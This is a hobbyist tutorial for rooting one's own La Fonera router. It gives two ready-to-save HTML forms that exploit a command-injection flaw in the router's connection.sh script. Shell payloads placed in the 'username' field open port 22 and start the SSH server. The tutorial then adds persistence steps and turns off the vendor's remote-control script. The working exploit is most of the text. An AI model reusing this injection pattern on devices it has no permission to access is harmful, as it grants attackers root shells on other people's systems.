Hacking La Fonera

(Klicke hier für die deutsche Version)

Inspired by Michael's and Stefan's hack the FON-Community found the following way to inject shell code into the system without using FON's website or opening the unit.

The method presented here WORKS at least with firmware 0.7.0r4 up to 0.7.1r1!

Attention: It's NOT WORKING for firmware higher than 0.7.1r1! Hint: If your La Fonera was not delivered with this firmware originally to you, reset La Fonera so it will start a new with its original firmware. Make then the SSH-hack first and all updates of the firmware afterwards and you will keep your SSH-access! :-)

How to hack La Fonera?

To open SSH-access and to prevent FON from executing code on your La Fonera do the following:

Safe the following code as "step1.html" on your harddisk:

<html>
<head>
<title>Step 1-2 to open SSH-access to La Fonera</title>
</head>
<body>
<center>
<h1>Open SSH-access to La Fonera</h1>
(Model: FON2100A/B/C & FON2200)
<h2>Works with firmware 0.7.0r4 up to 0.7.1r1</h2>
<h3>Step 1 of 2 for connection via LAN</h3>
<form method="post" action="http://169.254.255.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT)" size="60">
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='&quot;;' + this.form.wifimode.value +';&quot;'}">
</form>
</center>
</body>
</html>

And now safe this code as "step2.html" on your harddisk:

<html>
<head>
<title>Step 2-2 to open SSH-access to La Fonera</title>
</head>
<body>
<center>
<h1>Open SSH-access to La Fonera</h1>
(Model: FON2100A/B/C & FON2200)
<h2>Works with firmware 0.7.0r4 up to 0.7.1r1</h2>
<h3>Step 2 of 2 for connection via LAN</h3>
<form method="post" action="http://169.254.255.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/etc/init.d/dropbear)" size="60">
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='&quot;;' + this.form.wifimode.value +';&quot;'}">
</form>
</center>
</body>
</html>

Make sure JavaScript is enabled for your browser!

Set your computer's LAN to IP 169.254.255.2, Subnetmask 255.255.255.0 and Gateway 169.254.255.1. Leave the fields for the DNS-servers empty! Now connect your La Fonera via LAN to your computer and power on La Fonera.

After successful connection open the html-pages "step1.html" and "step2.html" in your browser to see the following:

Now click the SUBMIT-Button on the first webpage, authenticate with username "root" and password "admin" (FON-defaults) and wait until the browser is ready.

After this switch to the second webpage (page 02) and click on this SUBMIT-button.

Now you are ready to connect your La Fonera via SSH. Connect with Putty (download here) via SSH (SSH 1) to IP 169.254.255.1 (La Fonera) and log in with username "root" and password "admin" (FON-defaults).

After that, do the following to permanently enable shell-access:

mv /etc/init.d/dropbear /etc/init.d/S50dropbear
vi /etc/firewall.user

PRESS "i" (insert) to edit the firewall settings by uncommenting the two lines at the SSH section, so it will look like this

Now safe your work by pressing "ESC" and typing ":wq" (write and quit) and pressing ENTER. Now you can reboot La Fonera by using the command "reboot" and pressing ENTER or executing these two commands:

/etc/init.d/S50dropbear
/etc/firewall.user

Last but not least you should prevent FON from executing code on your box by changing the last lines of the script

vi /bin/thinclient

to look like this:

Now safe your work by pressing "ESC" and typing ":wq" (write and quit) and pressing ENTER. Now you can close your SSH-connection (and exit Putty) using the command "exit" and pressing ENTER.

Now only you have full access to your box ... :-)